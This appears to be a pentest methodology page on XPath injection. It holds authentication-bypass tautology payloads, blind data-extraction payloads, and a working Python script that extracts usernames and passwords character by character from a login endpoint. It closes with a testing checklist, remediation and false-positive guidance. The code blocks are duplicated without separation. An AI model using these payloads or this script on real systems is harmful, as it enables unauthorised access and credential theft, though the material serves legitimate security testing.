XPath Injection
XPath injection targets applications that use XML databases or XML-backed authentication. By manipulating XPath queries, attackers can bypass authentication, extract entire XML documents, and access data they shouldn't see. Unlike SQL injection, XPath has no concept of permissions — a successful injection gives access to the entire XML document.
Authentication Bypass
XPath authentication queries typically follow the pattern //user[username='INPUT' and password='INPUT'].
By injecting tautologies (always-true conditions), attackers can bypass authentication the same way as SQL injection.
# Inject into Username and Password fields:
' or '1'='1
' or '1'='1
# Result: //user[username='' or '1'='1' and password='' or '1'='1']
admin' or '1'='1' or '1'='1
anything
admin']
anything
' or 1=1 or ''
' or 1=1 or ''# Inject into Username and Password fields:
' or '1'='1
' or '1'='1
# Result: //user[username='' or '1'='1' and password='' or '1'='1']
admin' or '1'='1' or '1'='1
anything
admin']
anything
' or 1=1 or ''
' or 1=1 or ''Data Extraction
Unlike SQL, XPath has no permission system — a successful injection can access the entire XML document.
Use XPath functions like name(), substring(), count(), and contains()
to enumerate the XML structure and extract values.
# Discover XML structure (node names):
' or name(.)='a' or 'a'='b
' or name(parent::*)='users' or 'a'='b
# Character-by-character string extraction:
' or substring(//user[1]/username,1,1)='a' or 'a'='b
' or substring(//user[1]/username,1,1)='b' or 'a'='b
# Count nodes:
' or count(//user)>0 or 'a'='b
' or count(//user)>5 or 'a'='b
' or count(//user)=10 or 'a'='b
# String length:
' or string-length(//user[1]/password)>5 or 'a'='b
' or string-length(//user[1]/password)=8 or 'a'='b
# Content search:
' or contains(//user[1]/password,'admin') or 'a'='b# Discover XML structure (node names):
' or name(.)='a' or 'a'='b
' or name(parent::*)='users' or 'a'='b
# Character-by-character string extraction:
' or substring(//user[1]/username,1,1)='a' or 'a'='b
' or substring(//user[1]/username,1,1)='b' or 'a'='b
# Count nodes:
' or count(//user)>0 or 'a'='b
' or count(//user)>5 or 'a'='b
' or count(//user)=10 or 'a'='b
# String length:
' or string-length(//user[1]/password)>5 or 'a'='b
' or string-length(//user[1]/password)=8 or 'a'='b
# Content search:
' or contains(//user[1]/password,'admin') or 'a'='bBlind XPath Injection
import requests
import string
url = "https://target.com/login"
charset = string.ascii_letters + string.digits + "@._-"
def xpath_blind(query):
payload = f"' or {query} or 'a'='b"
resp = requests.post(url, data={
'username': payload,
'password': 'x'
})
return 'Welcome' in resp.text # True condition indicator
# Count users:
for i in range(1, 50):
if xpath_blind(f'count(//user)={i}'):
print(f'[+] Found {i} users')
break
# Extract username character by character:
def extract_string(xpath_expr, max_len=50):
result = ''
for pos in range(1, max_len + 1):
found = False
for char in charset:
if xpath_blind(f"substring({xpath_expr},{pos},1)='{char}'"):
result += char
print(f'[+] {xpath_expr}: {result}')
found = True
break
if not found:
break
return result
# Extract all usernames:
user_count = 10 # from previous step
for i in range(1, user_count + 1):
username = extract_string(f'//user[{i}]/username')
password = extract_string(f'//user[{i}]/password')
print(f'User {i}: {username}:{password}')import requests
import string
url = "https://target.com/login"
charset = string.ascii_letters + string.digits + "@._-"
def xpath_blind(query):
payload = f"' or {query} or 'a'='b"
resp = requests.post(url, data={
'username': payload,
'password': 'x'
})
return 'Welcome' in resp.text # True condition indicator
# Count users:
for i in range(1, 50):
if xpath_blind(f'count(//user)={i}'):
print(f'[+] Found {i} users')
break
# Extract username character by character:
def extract_string(xpath_expr, max_len=50):
result = ''
for pos in range(1, max_len + 1):
found = False
for char in charset:
if xpath_blind(f"substring({xpath_expr},{pos},1)='{char}'"):
result += char
print(f'[+] {xpath_expr}: {result}')
found = True
break
if not found:
break
return result
# Extract all usernames:
user_count = 10 # from previous step
for i in range(1, user_count + 1):
username = extract_string(f'//user[{i}]/username')
password = extract_string(f'//user[{i}]/password')
print(f'User {i}: {username}:{password}')Testing Checklist
- 1. Identify potential XPath entry points (login forms, search, XML-backed APIs)
- 2. Test for errors with single quotes:
'in input fields - 3. Test authentication bypass with classic XPath tautologies
- 4. Test blind extraction using substring() and boolean conditions
- 5. Enumerate XML structure with name() and count()
- 6. Test for XPath 2.0 functions if available
Evidence Collection
Injection Proof: Request/response showing authentication bypass or data extraction
Data Extracted: Usernames, structure — redact passwords in report
CVSS Range: Auth bypass: 8.1–9.8 | Data extraction: 7.5–8.6
Remediation
- Parameterized XPath: Use parameterized/precompiled XPath queries instead of string concatenation.
- Input validation: Reject or escape special characters:
' " [ ] / @ = *. - Migrate to database: Consider migrating from XML data stores to a proper database with access controls.
False Positive Identification
- XML parsing error ≠ injection: An XML/XPath error in the response indicates input reaches the query, but confirm you can extract data or bypass logic before classifying as exploitable injection.
- Limited data in XML store: XPath injection in a config file with no sensitive data may be low impact — assess what data the XML document contains.
- Modern frameworks protection: Many frameworks parameterize XPath queries — verify injection actually modifies the query structure, not just passes through as literal text.